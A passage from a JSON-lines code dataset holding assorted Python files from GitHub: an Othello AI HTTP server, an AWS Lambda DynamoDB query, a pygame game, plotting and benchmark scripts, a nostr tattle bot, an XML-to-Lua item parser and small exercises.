HTTPException(status_code=404, detail=\"Oops, try topGainers or topLosers\")\n \n \n\n\n# @app.get(\"/items/{item_id}\")\n# def read_item(item_id: int, q: Union[str, None] = None):\n# return {\"item_id\": item_id, \"q\": q}","repo_name":"karthik5699/langchainXFastAPI","sub_path":"fastapi1.py","file_name":"fastapi1.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16496291780","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ncommands = [input().strip() for _ in range(n)]\r\nstack = []\r\n\r\nfor command in commands:\r\n command = command.split()\r\n if command[0] == 'push':\r\n stack.append(command[1])\r\n elif command[0] == 'pop':\r\n print(-1) if not stack else print(stack.pop())\r\n elif command[0] == 'size':\r\n print(len(stack))\r\n elif command[0] == 'empty':\r\n print(0) if stack else print(1)\r\n elif command[0] == 'top':\r\n print(stack[-1]) if stack else print(-1)","repo_name":"vbellv/Algorithm","sub_path":"백준/Silver/10828. 스택/스택.py","file_name":"스택.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32024566946","text":"from http.server import BaseHTTPRequestHandler,HTTPServer, SimpleHTTPRequestHandler\nimport json\nimport copy\nfrom random import randint\n\n#find the lists from each directions.\ndef getVectors(state, r, c):\n vectors = []\n #left\n left = state[r][:c]\n #reverse order\n left = left[::-1]\n l = []\n for item in left:\n if item != ' ':\n l.append(item)\n else:\n break\n #print(l)\n vectors.append(l)\n\n #LU\n lu = []\n i = r - 1\n j = c - 1\n while i >= 0 and j >= 0:\n if state[i][j] != ' ':\n lu.append(state[i][j])\n else:\n break\n i -= 1\n j -= 1\n #print(lu)\n vectors.append(lu)\n\n col = []\n for row in state:\n col.append(row[c])\n\n #up\n up = col[: r]\n #reverse order\n up = up[::-1]\n u = []\n for item in up:\n if item != ' ':\n u.append(item)\n else:\n break\n #print(u)\n vectors.append(u)\n\n #RU\n ru = []\n i = r - 1\n j = c + 1\n while i >= 0 and j < len(state):\n if state[i][j] != ' ':\n ru.append(state[i][j])\n else:\n break\n i -= 1\n j += 1\n #print(ru)\n vectors.append(ru)\n\n #right\n right = state[r][c + 1:]\n r_l = []\n for item in right:\n if item != ' ':\n r_l.append(item)\n else:\n break\n #print(r_l)\n vectors.append(r_l)\n\n #RD\n rd = []\n i = r + 1\n j = c + 1\n while i < len(state) and j < len(state):\n if state[i][j] != ' ':\n rd.append(state[i][j])\n else:\n break\n i += 1\n j += 1\n #print(rd)\n vectors.append(rd)\n\n #down\n down = col[r + 1:]\n d = []\n for item in down:\n if item != ' ':\n d.append(item)\n else:\n break\n #print(d)\n vectors.append(d)\n\n #LD\n ld = []\n i = r + 1\n j = c - 1\n while i < len(state) and j >= 0:\n if state[i][j] != ' ':\n ld.append(state[i][j])\n else:\n break\n i += 1\n j -= 1\n #print(ld)\n vectors.append(ld)\n return vectors\n\ndef getActionsByIndex(state, r, c, find, opposite):\n actions = []\n vectors = getVectors(state, r, c)\n\n #print(find)\n #print(vectors)\n for i, item in enumerate(vectors):\n if len(item) > 0:\n if opposite not in item:\n #these are valid actions\n if i == 0:\n #left\n new_c = c - len(item) - 1\n if new_c >= 0:\n actions.append([r, new_c])\n if i == 1:\n #left-up\n new_r = r - len(item) - 1\n new_c = c - len(item) - 1\n if new_r >= 0 and new_c >= 0:\n actions.append([new_r, new_c])\n if i == 2:\n #up\n new_r = r - len(item) - 1\n if new_r >= 0:\n actions.append([new_r, c])\n if i == 3:\n #right-up\n new_r = r - len(item) - 1\n new_c = c + len(item) + 1\n if new_r >= 0 and new_c < len(state):\n actions.append([new_r, new_c])\n if i == 4:\n #right\n new_c = c + len(item) + 1\n if new_c < len(state):\n actions.append([r, new_c])\n if i == 5:\n #right-down\n new_r = r + len(item) + 1\n new_c = c + len(item) + 1\n if new_r < len(state) and new_c < len(state):\n actions.append([new_r, new_c])\n if i == 6:\n #down\n new_r = r + len(item) + 1\n if new_r < len(state):\n actions.append([new_r, c])\n if i == 7:\n #left-down\n new_r = r + len(item) + 1\n new_c = c - len(item) - 1\n if new_r < len(state) and new_c >= 0:\n actions.append([new_r, new_c])\n\n return actions\n\ndef getActions(state, find):\n actions = []\n indexFind = 'X'\n if find == 'X':\n indexFind = 'O'\n for r, row in enumerate(state):\n for c, item in enumerate(row):\n if item == find:\n for item in getActionsByIndex(state, r, c, indexFind, find):\n if item not in actions:\n actions.append(item)\n return actions\n\ndef setState(state, r, c, color):\n vectors = getVectors(state, r, c)\n new_state = copy.deepcopy(state)\n #print(vectors)\n for i, item in enumerate(vectors):\n if len(item) > 0:\n if color in item:\n #find the count of non color in the list.\n count = getCountList(item, color)\n if count > 0:\n if i == 0:\n #left\n for j in range(count):\n new_state[r][c - (j + 1)] = color\n if i == 1:\n #left-up\n for j in range(count):\n new_state[r - (j + 1)][c - (j + 1)] = color\n if i == 2:\n #up\n for j in range(count):\n new_state[r - (j + 1)][c] = color\n if i == 3:\n #right-up\n for j in range(count):\n new_state[r - (j + 1)][c + (j + 1)] = color\n if i == 4:\n #right\n for j in range(count):\n new_state[r][c + (j + 1)] = color\n if i == 5:\n #right-down\n for j in range(count):\n new_state[r + (j + 1)][c + (j + 1)] = color\n if i == 6:\n #down\n for j in range(count):\n new_state[r + (j + 1)][c] = color\n if i == 7:\n #left-down\n for j in range(count):\n new_state[r + (j + 1)][c - (j + 1)] = color\n #print(count)\n #print(item)\n new_state[r][c] = color\n return new_state\n\ndef getCountList(l, color):\n count = 0\n for item in l:\n if item != color:\n count += 1\n else:\n break\n return count\n\ndef getColorCount(state, color):\n count = 0\n for r in state:\n for c in r:\n if c == color:\n count += 1\n return count\n\ndef getActionOutcomes(actions, state, color) :\n new_states = []\n for action in actions:\n item = {}\n item[\"action\"] = action\n item[\"state\"] = setState(state, action[0], action[1], color)\n item[\"count\"] = getColorCount(item[\"state\"], color)\n new_states.append(item)\n return new_states\n\ndef getMaxActions(game_state, color):\n rtnActions = []\n\n actions = getActions(game_state, color)\n\n states = getActionOutcomes(actions, game_state, color)\n\n states.sort(key=lambda x: x[\"count\"], reverse=True)\n\n #max val\n if len(states) > 0:\n max_val = states[0]['count']\n #rtnActions = list(filter(lambda x: x['count'] == max_val, states))\n\n for item in states:\n if item['count'] == max_val:\n rtnActions.append(item)\n\n return rtnActions\n\ndef rateOption(game_state, action):\n rating = 0\n r = action[0]\n c = action[1]\n n = len(game_state)\n #make edge pieces worth + 7\n if r == 0 or r == n - 1:\n rating += 25\n #make corners worth the most\n if c == 0 or c == n - 1:\n rating += 40\n if c == 0 or c == n - 1:\n rating += 25\n\n if r > 0:\n if c > 0:\n if game_state[r - 1][c - 1] == ' ':\n rating += 5\n if game_state[r - 1][c] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r - 1][c + 1] == ' ':\n rating += 5\n if c > 0:\n if game_state[r][c - 1] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r][c + 1] == ' ':\n rating += 1\n if r < n - 1:\n if c > 0:\n if game_state[r + 1][c - 1] == ' ':\n rating += 5\n if game_state[r + 1][c] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r + 1][c + 1] == ' ':\n rating += 5\n\n #minus points for leeting oponent get to outside.\n if r == 1 or r == n - 2:\n if c > 0 and c < n - 1:\n rating -= 12\n if c == 1 or c == n - 1:\n rating -= 30\n if c == 1 or c == n - 2:\n if r > 0 and r < n - 1:\n rating -= 12\n\n return rating\n\ndef getBestOption(game_state, find):\n #get all possibles.\n opositeFind = 'X'\n if find == 'X':\n opositeFind = 'O'\n\n actions = getActions(game_state, find)\n states = getActionOutcomes(actions, game_state, find)\n\n options = []\n min_count = -1\n\n for option in states:\n r = option['action'][0]\n c = option['action'][1]\n\n #check for corners.\n if r == 0:\n if c == 0 or c == len(game_state) - 1:\n return option\n elif r == len(game_state) - 1:\n if c == 0 or c == len(game_state) - 1:\n return option\n\n max_actions = getMaxActions(option['state'], opositeFind)\n\n print(max_actions)\n\n if len(max_actions) == 0:\n #game ender or oponent cannot move.\n return option\n else:\n if min_count == -1 or min_count > max_actions[0]['count']:\n min_count = max_actions[0]['count']\n options = []\n options.append(option)\n elif min_count == max_actions[0]['count']:\n options.append(option)\n\n if len(options) > 1:\n #lets get greedy\n options.sort(key=lambda x: x['count'], reverse=True)\n max_flips = options[0]['count']\n options = list(filter(lambda x: x['count'] == max_flips, options))\n\n #lets get best by custom heuristic\n best_rated = []\n highest = -1\n for option in options:\n rating = rateOption(option['state'], option['action'])\n if highest == -1 or rating > highest:\n highest = rating\n best_rated = []\n best_rated.append(option)\n elif rating == highest:\n best_rated.append(option)\n\n #now if there is more than 1 random pick\n if len(best_rated) > 1:\n #random\n index = randint(0, len(best_rated) - 1)\n return best_rated[index]\n else:\n #must be at least 1.\n return best_rated[0]\n elif len(options) == 1:\n return options[0]\n else:\n return None\n\ndef getBestChoice(state, color):\n best = getBestOption(state, color)\n\n if best is not None:\n return best['action']\n else:\n return None\n\nclass GetHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n return\n\n def do_POST(self):\n if self.path == '/api/v1/ai':\n content_len = int(self.headers.get('Content-Length'))\n post_body = self.rfile.read(content_len).decode(\"utf-8\")\n data = json.loads(post_body)\n\n #find the best option.\n choice = getBestChoice(data[\"state\"], data[\"status\"][\"player\"][\"color\"])\n print(choice)\n\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n\n rtnData = {}\n rtnData[\"player\"] = data[\"status\"][\"player\"]\n rtnData[\"location\"] = choice\n post_data = json.dumps(rtnData)\n\n self.wfile.write(bytes(post_data, 'utf8'))\n return\n\nHandler=GetHandler\n\nhttpd=HTTPServer((\"0.0.0.0\", 9000), Handler)\nhttpd.serve_forever()\n","repo_name":"randysimpson/othello","sub_path":"othello-ai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19919028951","text":"import json\nfrom boto3.dynamodb.conditions import Key, Attr\nimport boto3\nfrom json2html import *\nfrom datetime import date, datetime, time, timedelta\nimport os\n\nSECRET_ACCESS_KEY = os.environ['SKEY']\nACCESS_KEY_ID = os.environ['AKEY']\n\ndef lambda_handler(event, context):\n\n dynamodb = boto3.resource('dynamodb', \\\n aws_access_key_id=ACCESS_KEY_ID, \n aws_secret_access_key=SECRET_ACCESS_KEY, \n region_name='us-west-2')\n table = dynamodb.Table('baboons1')\n baboon = str(event[\"queryStringParameters\"]['indiv'])\n t0 = str(event[\"queryStringParameters\"]['t0'])\n t1 = str(event[\"queryStringParameters\"]['t1'])\n dfflag = event[\"queryStringParameters\"]['table'].lower() == \"true\"\n\n # two query types: query and scan; here are format notes: \n # response = table.query(KeyConditionExpression=Key('indiv').eq(baboon) & Key('time').between(d0, final_dt.strftime(\"%T\")))\n # response = table.scan(FilterExpression=Key('indiv').eq(baboon) & Key('x').between(d0, final_dt.strftime(\"%T\")))\n\n response = table.query(KeyConditionExpression=Key('indiv').eq(baboon) & Key('time').between(t0, t1))\n\n for item in response['Items']: item['row'] = float(item['row'])\n\n if not dfflag:\n print(\"Returning JSON\")\n dict_string = json.dumps(response['Items'], indent=4)\n return { \"statusCode\": 200, \"body\": dict_string }\n else:\n print(\"Returning HTML\")\n return { \n \"statusCode\": 200, \n \"body\": json2html.convert(response['Items']), \n \"headers\": {'Content-Type': 'text/html'}\n }\n","repo_name":"robfatland/zero2x","sub_path":"Zero2API/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38731229222","text":"import sys\nimport pygame\nfrom character import Character\nfrom ball import Ball\nfrom random import randint\n\n\ndef run_game():\n pygame.init()\n screen = pygame.display.set_mode((1200, 800))\n background = (0, 0, 200)\n pygame.display.set_caption(\"Blue Skies\")\n character = Character(screen)\n ball = Ball(screen)\n lives = 3\n\n game_active = True\n moving_right = False\n moving_left = False\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n moving_left = True\n elif event.key == pygame.K_RIGHT:\n moving_right = True\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n moving_left = False\n elif event.key == pygame.K_RIGHT:\n moving_right = False\n\n if game_active:\n screen.fill(background)\n\n if moving_left and character.rect.left > 0:\n character.rect.x -= 2\n if moving_right and character.rect.right < 1200:\n character.rect.x += 2\n\n ball.fall()\n if ball.rect.top > 800:\n ball.rect.top = 0\n ball.rect.x = randint(50, 1100)\n lives -= 1\n elif ball.rect.colliderect(character.rect):\n ball.rect.top = 0\n ball.rect.x = randint(50, 1100)\n\n ball.blitme()\n character.blitme()\n pygame.display.flip()\n if lives == 0:\n game_active = False\n\n if game_active is False:\n sys.exit()\n\n\nrun_game()\n","repo_name":"VictorStankov/Python_Crash_Course","sub_path":"Try it Yourself/Chapter 13/Catch/Catch.py","file_name":"Catch.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21470604912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 6 22:28:25 2022\r\n\r\n@author: nithi\r\n\"\"\"\r\n# To plot the graph\r\nimport matplotlib.pyplot as plt\r\n# Used to read the csv file\r\nimport pandas as pd\r\n# Creating a varaiable and stores the csv file data in it.\r\nread_data = pd.read_csv(r'D:\\Applied Data Science 1\\Assignment_1\\All Countries.csv')\r\nprint(read_data)\r\n# .loc is used to access a sepcific country from the column\r\nselectedCountry=read_data.loc[read_data['Location'] == 'South Africa']\r\nselectedCountry2=read_data.loc[read_data['Location'] == 'Congo']\r\nselectedCountry3=read_data.loc[read_data['Location'] == 'Egypt']\r\nselectedCountry4=read_data.loc[read_data['Location'] == 'Indonesia']\r\n# Creating Varaible x,y,w,u to store the selected country's year and its value\r\nx = selectedCountry['Period']\r\ny = selectedCountry['Value']\r\nw = selectedCountry2['Period']\r\nu = selectedCountry2['Value']\r\nplt.figure()\r\n# Line Plot the x and y function. Label are used to produce legend\r\nplt.plot(x,y,label='South Africa')\r\nplt.plot(w,u,label='Congo')\r\n# Used to label the x-axis and y-axis\r\nplt.xlabel('Year')\r\nplt.ylabel('Percentage (%)') \r\n#To Name the title for the graph \r\nplt.title('TB Patients with HIV')\r\n# Add the legend and loc is used to produce the legend in specific side of the graph\r\nplt.legend(loc='lower right')\r\n# To Remove the whitespace from x-axis\r\nplt.margins(x=0)\r\n# To show the graph\r\nplt.show()\r\nplt.figure()\r\n# Pie plotting the specific countries year\r\n# autopct is used to specify the percentage for each silce of pie\r\n# explode is used to seprate the slice from the pie\r\nplt.pie(selectedCountry3['Value'],labels=selectedCountry3['Period'],\r\n autopct= '%1.2f%%',explode=(0.2,0,0,0.2,0,0,0))\r\nplt.title(\"Egypt TB Patients with HIV\")\r\nplt.show()\r\nplt.figure()\r\n# Bar plotting the counties percentage in y-axis and years in x-axis\r\nplt.bar(selectedCountry4['Period'],selectedCountry4['Value'],label='Indonesia')\r\nplt.xlabel('Year')\r\nplt.ylabel('Percentage (%)') \r\nplt.title('TB Patients with HIV')\r\nplt.legend()\r\nplt.show()","repo_name":"Nithin-Chakaravarthi-Murugavel/Assignment1","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1129255213","text":"#\n# 12\n#\n# Magic Method '__call__()'.\n# Functors and Decorator Classes\n\nimport math\n\n\nclass Counter:\n def __init__(self):\n self.__counter = 0\n\n def __call__(self, step=1, *args, **kwargs):\n print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n self.__counter += step\n return self.__counter\n\n\nclass StripChars:\n def __init__(self, chars):\n self.__chars = chars\n\n def __call__(self, *args, **kwargs):\n print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n if not isinstance(args[0], str):\n raise TypeError(\"the argument should be a string\")\n\n return args[0].strip(self.__chars)\n\n\nclass Derivate:\n def __init__(self, func):\n self.__fn = func\n\n def __call__(self, x, dx=0.0001, *args, **kwargs):\n print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n\n return (self.__fn(x + dx) - self.__fn(x)) / dx\n\n\n@Derivate\ndef df_sin(x):\n return math.sin(x)\n\n\ncounter = Counter()\nprint(counter.__dict__)\ncounter()\ncounter()\ncounter()\nprint(counter(3))\n# -----------------\ns1 = StripChars(\"?:!.; \")\nresult = s1(\" Hello World! ;\")\nprint(result)\n# -----------------\nprint(df_sin(math.pi / 3))\n# df_sin = Derivate(df_sin)\n# print(df_sin(math.pi / 3))\n","repo_name":"sa2209GitHub/python_oop","sub_path":"lesson_12.py","file_name":"lesson_12.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11558917869","text":"from output import json_output\n\n#Give this function a json response that has auto_chapters and speaker_labels set to true\n#see the output formatted in a way that makes it easy to embed & store each individual chapter in a vector DB\ndef speaker_diarized_output(json_response):\n # Check if auto_chapters and speaker_labels are true\n if not (json_response.get('auto_chapters') and json_response.get('speaker_labels')):\n return None\n\n chapters = json_response.get('chapters', [])\n utterances = json_response.get('utterances', [])\n\n diarized_output = []\n\n for chapter in chapters:\n chapter_start = chapter['start']\n chapter_end = chapter['end']\n\n # Filter utterances that fall within the chapter's start and end time\n relevant_utterances = [u for u in utterances if u['start'] >= chapter_start and u['end'] <= chapter_end]\n\n # Generate the speaker diarized output for each relevant utterance\n chapter_transcript = []\n for utterance in relevant_utterances:\n speaker = utterance['speaker']\n start_time = utterance['start']\n end_time = utterance['end']\n text = utterance['text']\n\n formatted_output = f\"Speaker {speaker} [{start_time/1000:.2f} - {end_time/1000:.2f}]: {text}\"\n chapter_transcript.append(formatted_output)\n\n diarized_output.append({\n 'chapter_summary': chapter['summary'],\n 'transcript': chapter_transcript\n })\n\n return diarized_output\n\ndiarized_response = speaker_diarized_output(json_output)\nfor chapter in diarized_response:\n print(f'{chapter[\"chapter_summary\"]} \\n')\n print(f'{chapter[\"transcript\"]} \\n\\n')\n","repo_name":"saflamini/ai-helpers","sub_path":"diarized_full_chapters.py","file_name":"diarized_full_chapters.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23788236217","text":"# © SleepECG developers\n#\n# License: BSD (3-clause)\n\n\"\"\"Plot results of runtime and detection quality benchmarks.\"\"\"\n\nimport sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\n\nif len(sys.argv) != 2:\n print(\"Usage: python plot_benchmark_results.py .csv\")\n exit()\n\nresults_filepath = Path(sys.argv[1])\nbenchmark, db_slug, *_ = results_filepath.stem.split(\"__\")\nplot_filepath = results_filepath.with_suffix(\".svg\")\nresults = pd.read_csv(results_filepath).sort_values(\"detector\")\n\nif benchmark == \"runtime\":\n fs = results[\"fs\"][0]\n results[\"signal_len\"] = results[\"num_samples\"] / (results[\"fs\"] * 3600)\n results = results.groupby([\"detector\", \"signal_len\"], as_index=False).agg(\n mean_runtime=(\"runtime\", \"mean\"),\n std_runtime=(\"runtime\", \"std\"),\n n=(\"runtime\", \"count\"),\n )\n results[\"error\"] = results[\"std_runtime\"] / np.sqrt(results[\"n\"])\n\n # order by runtime for longest signal, slowest algorithm first\n maxlen = results[\"signal_len\"].max()\n order = (\n results.query(f\"signal_len == {maxlen}\")\n .groupby(\"detector\")[\"mean_runtime\"]\n .mean()\n .apply(lambda x: 1 / x) # reverse order\n .to_dict()\n )\n results = results.sort_values(by=[\"detector\", \"signal_len\"], key=lambda x: x.map(order))\n\n # each detector should have the same color in each benchmark\n colors = [px.colors.qualitative.Plotly[i] for i in [0, 1, 7, 5, 8, 4, 2, 3, 9, 6]]\n\n fig = (\n px.line(\n results,\n x=\"signal_len\",\n y=\"mean_runtime\",\n markers=True,\n color=\"detector\",\n color_discrete_sequence=colors,\n log_y=True,\n labels={\n \"signal_len\": \"Signal length (hours)\",\n \"mean_runtime\": \"Mean runtime (s)\",\n },\n title=f\"Mean detector runtime for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_yaxes(rangemode=\"tozero\")\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelif benchmark == \"metrics\":\n results[\"precision\"] = results[\"TP\"] / (results[\"TP\"] + results[\"FP\"])\n results[\"recall\"] = results[\"TP\"] / (results[\"TP\"] + results[\"FN\"])\n results[\"f1\"] = 2 / (results[\"recall\"] ** -1 + results[\"precision\"] ** -1)\n fig = (\n px.box(\n results.melt(id_vars=[\"detector\"], value_vars=[\"precision\", \"recall\", \"f1\"]),\n color=\"detector\",\n y=\"value\",\n labels={\"value\": \"\"},\n facet_col=\"variable\",\n title=f\"Metrics for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_xaxes(range=[-0.4, 0.4])\n .update_yaxes(range=[-0.01, 1.01], tick0=0, dtick=0.1)\n .for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[1]))\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelif benchmark == \"rri_similarity\":\n fig = (\n px.box(\n results,\n y=\"pearsonr\",\n color=\"detector\",\n labels={\"pearsonr\": \"Correlation coefficient\"},\n title=f\"Correlation coefficient for RRI timeseries for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_yaxes(range=[-1.01, 1.01], tick0=-1, dtick=0.25)\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelse:\n raise ValueError(f\"No plotting strategy defined for {results_filepath}.\")\n","repo_name":"cbrnr/sleepecg","sub_path":"examples/benchmark/plot_benchmark_results.py","file_name":"plot_benchmark_results.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"72119825127","text":"\"\"\"\nTattleBot will listen for kind=1984 reports and notify the subject of the report that they've been tattled on.\n\nYou can subclass TattleBot and override handle_message(event, tattle_subject, message) to do something more interesting with the generated message\nOverride create_message(event, report_type, tattled_event_id, impersonation) to generate a different response\n\nTo run:\nTATTLE_WATCH= NOSTR_KEY= nostr-bot run -c nostr_bot.examples.reporting.TattleBot -r wss://my.relay.biz\n\n\"\"\"\n\nfrom nostr_bot.bot import CommunicatorBot\nfrom aionostr.util import to_nip19\nimport shelve\nimport os\nimport time\n\n\nclass TattleBot(CommunicatorBot):\n SEND_MESSAGE = False\n\n shelf = shelve.open('tattlebot')\n\n def get_query(self):\n query = {\n 'kinds': [1984]\n }\n last_seen = self.get_last_seen()\n if last_seen:\n query['since'] = last_seen\n pubkeys = self.get_watch_for_pubkeys()\n if pubkeys:\n query['#p'] = pubkeys\n return query\n\n def get_last_seen(self):\n return self.shelf.get('last_seen', 0)\n\n def set_last_seen(self, event):\n self.shelf['last_seen'] = max(event.created_at, self.get_last_seen())\n\n def get_watch_for_pubkeys(self):\n pubkeys = os.getenv('TATTLE_WATCH', '').split(',')\n if all(pubkeys):\n return pubkeys\n\n async def handle_event(self, event):\n if event.id in self.shelf:\n self.log.info(\"Skipping %s\", event.id)\n return\n report_type = ''\n tattled_event_id = ''\n tattle_subject = ''\n impersonation = ''\n for tag in event.tags:\n if tag[0] == 'report':\n report_type = tag[1]\n elif tag[0] == 'e':\n tattled_event_id = tag[1]\n elif tag[0] == 'p':\n if len(tag) == 3 and tag[2] == 'impersonation':\n impersonation = tag[1]\n else:\n tattle_subject = tag[1]\n\n message = self.create_message(event, report_type, tattled_event_id, impersonation)\n\n response = await self.handle_message(event, tattle_subject, message)\n self.set_last_seen(event)\n self.shelf[event.id] = {'seen': time.time(), 'response': response}\n\n def create_message(self, event, report_type, tattled_event_id, impersonation):\n reporter = to_nip19('npub', event.pubkey)\n if tattled_event_id:\n tattle_note = to_nip19('note', tattled_event_id)\n else:\n tattle_note = ''\n if report_type == 'spam':\n reason = 'spamming'\n elif report_type == 'illegal':\n reason = 'doing something illegal'\n elif report_type == 'impersonation':\n reason = f'impersonating {to_nip19(\"npub\", impersonation)}'\n else:\n reason = report_type\n response = f'''YOU'RE IN TROUBLE\n{reporter} tattled on you for {reason} in {tattle_note}.\nThey said you were \"{event.content}\"\n\nJust letting you know.\n\nSent by TattleBot.\n'''\n return response\n\n async def handle_message(self, event, tattle_subject, message):\n if tattle_subject and message:\n if self.SEND_MESSAGE:\n dm = self.make_dm(tattle_subject, content=message)\n self.log.debug(str(dm))\n await self.reply(dm)\n self.log.info(\"Alerted %s about tattling on %s with dm %s\", tattle_subject, event.id, dm.id)\n return dm.id\n else:\n self.log.info(\"%s tattled on %s. Sending:\\n%s\", event.pubkey, tattle_subject, message)\n","repo_name":"davestgermain/nostr_bot","sub_path":"nostr_bot/examples/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"35150320048","text":"class Animals:\n def __init__(self, name, noise, color):\n self.name = name;\n self.noise = noise;\n self.color = color;\n\n def describe(self):\n print('The {} is {} and makes the noise: {}'.format(self.name, self.color, self.noise));\n\n\ntiger = Animals('tiger', 'Rwaaarw', 'Orange and black');\ndolfin = Animals('dolfin', 'Reeeeeee', 'Grey');\n\ntiger.describe();\n\nclass House:\n def __init__(self, SqM, numberOfRooms, marketValue, backGarden):\n self.SqM = SqM;\n self.numberOfRooms = numberOfRooms;\n self.marketValue = marketValue;\n self.backGarden = backGarden;\n\nhouse_1024 = House(120, 4, 120000, True);\nhouse_3000 = House(300, 8, 1000000, True);\nhouse_1234 = House(80, 2, 78000, False);\n\nprint(house_1024.SqM);\nprint(house_3000.numberOfRooms);\nprint(house_1234.marketValue);\n","repo_name":"thomas367/learning","sub_path":"Languages/Python/13. Classes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4414864291","text":"import xml.etree.ElementTree as ET\nimport json\n\ndef get_attribute_value(item, key):\n attribute = item.find(f\"attribute[@key='{key}']\")\n if attribute is not None:\n return attribute.get(\"value\")\n return None\n\ndef parse_item(item):\n item_data = {\n \"clientId\": int(item.get(\"id\")) if item.get(\"id\") else 0,\n \"itemName\": item.get(\"name\") or \"\",\n \"attack\": get_attribute_value(item, \"attack\") or \"\",\n \"armor\": get_attribute_value(item, \"armor\") or \"\",\n \"defense\": get_attribute_value(item, \"defense\") or \"\",\n \"extraDefense\": get_attribute_value(item, \"extradef\") or \"\",\n \"shootRange\": get_attribute_value(item, \"range\") or \"\",\n \"hitChance\": get_attribute_value(item, \"hitchance\") or \"\",\n \"weight\": int(get_attribute_value(item, \"weight\")) if get_attribute_value(item, \"weight\") else 0,\n \"desc\": get_attribute_value(item, \"description\") or \"\",\n \"uid\": int(item.get(\"id\")) if item.get(\"id\") else 0,\n \"itemType\": \"Common\",\n \"stackable\": True,\n \"action\": \"new\"\n }\n \n name = item.get(\"name\")\n if name:\n if \"helmet\" in name.lower():\n item_data[\"type\"] = \"Helmet\"\n elif \"armor\" in name.lower():\n item_data[\"type\"] = \"Armor\"\n elif \"shield\" in name.lower():\n item_data[\"type\"] = \"Shield\"\n elif \"sword\" in name.lower():\n item_data[\"type\"] = \"Sword\"\n elif \"legs\" in name.lower():\n item_data[\"type\"] = \"Legs\"\n elif \"boots\" in name.lower():\n item_data[\"type\"] = \"Boots\"\n elif \"ring\" in name.lower():\n item_data[\"type\"] = \"Ring\"\n elif \"necklace\" in name.lower():\n item_data[\"type\"] = \"Necklace\"\n elif \"boots\" in name.lower():\n item_data[\"type\"] = \"Boots\"\n\n weapon_type = get_attribute_value(item, \"weaponType\")\n if weapon_type:\n item_data[\"type\"] = weapon_type.capitalize()\n \n return item_data\n\ndef parse_xml_file(file_path):\n tree = ET.parse(file_path)\n root = tree.getroot()\n\n tooltips = []\n for item in root.findall(\"item\"):\n if get_attribute_value(item, \"weight\") is not None:\n item_data = parse_item(item)\n tooltips.append(item_data)\n\n return tooltips\n\n\ndef generate_lua_table(tooltips):\n lua_table = \"local tooltips = {\\n\"\n for tooltip in tooltips:\n lua_table += \" {\\n\"\n for key, value in tooltip.items():\n lua_table += f\" {key} = {repr(value)},\\n\"\n lua_table += \" },\\n\"\n lua_table += \"}\\n\"\n return lua_table\n\n\ndef main():\n xml_file = \"items.xml\"\n lua_file = \"tooltips.lua\"\n\n tooltips = parse_xml_file(xml_file)\n lua_table = generate_lua_table(tooltips)\n\n with open(lua_file, \"w\") as file:\n file.write(lua_table)\n\n print(f\"Se generó el archivo Lua: {lua_file}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Corlyone/canary-personal","sub_path":"data/items/parseitems.py","file_name":"parseitems.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14716652442","text":"from dnfpluginscore import logger\n\nimport os\nimport dnf\n\n\nclass Usrkeeper(dnf.Plugin):\n\n name = 'usrkeeper'\n\n def _out(self, msg):\n 